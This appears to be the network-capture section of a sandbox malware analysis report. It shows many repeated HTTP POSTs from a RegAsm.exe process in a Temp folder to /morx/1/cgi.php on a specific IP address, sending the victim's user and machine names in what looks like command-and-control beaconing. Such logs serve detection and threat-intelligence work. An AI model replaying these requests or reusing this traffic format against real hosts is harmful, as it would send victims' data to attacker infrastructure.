                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        149192.168.2.2249316185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:05.334399939 CET1338OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:05.418001890 CET1338OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:05.505003929 CET1339INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:04 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        15192.168.2.2249182185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:13.213063955 CET1161OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:13.277957916 CET1161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:13.388159037 CET1162INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:12 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        150192.168.2.2249317185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:05.711230993 CET1339OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:05.777348042 CET1340OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:05.862498045 CET1340INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:04 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        151192.168.2.2249318185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:06.056308031 CET1341OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:06.136904001 CET1341OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:06.254065990 CET1341INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:05 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        152192.168.2.2249319185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:06.456724882 CET1342OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:06.527218103 CET1342OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:06.617598057 CET1343INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:05 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        153192.168.2.2249320185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:06.823586941 CET1343OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:06.886838913 CET1344OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:06.974483967 CET1344INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:06 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        154192.168.2.2249321185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:07.184056044 CET1345OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:07.245943069 CET1345OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:07.346312046 CET1345INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:06 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        155192.168.2.2249322185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:07.553003073 CET1346OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:07.621242046 CET1346OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:07.742274046 CET1347INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:06 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        156192.168.2.2249323185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:07.954108953 CET1347OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:08.027307987 CET1347OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:08.126146078 CET1348INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:07 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        157192.168.2.2249324185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:08.324968100 CET1349OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:08.402383089 CET1349OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:08.523216009 CET1349INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:07 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        158192.168.2.2249325185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:08.752321959 CET1350OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:08.824282885 CET1350OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:08.911140919 CET1350INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:08 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        159192.168.2.2249326185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:09.107950926 CET1351OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:09.183665991 CET1351OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:09.274146080 CET1352INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:08 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        16192.168.2.2249183185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:13.606386900 CET1163OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:13.683672905 CET1163OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:13.778989077 CET1163INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:12 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        160192.168.2.2249327185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:09.490262032 CET1352OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:09.574273109 CET1353OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:09.668226004 CET1353INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:08 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        161192.168.2.2249328185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:09.873125076 CET1354OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:09.933414936 CET1354OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:10.024940968 CET1354INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:09 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        162192.168.2.2249329185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:10.232857943 CET1355OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:10.293123007 CET1355OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:10.470072985 CET1356INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:09 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        163192.168.2.2249330185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:10.663115025 CET1356OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:10.730576992 CET1357OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:10.820501089 CET1357INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:09 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
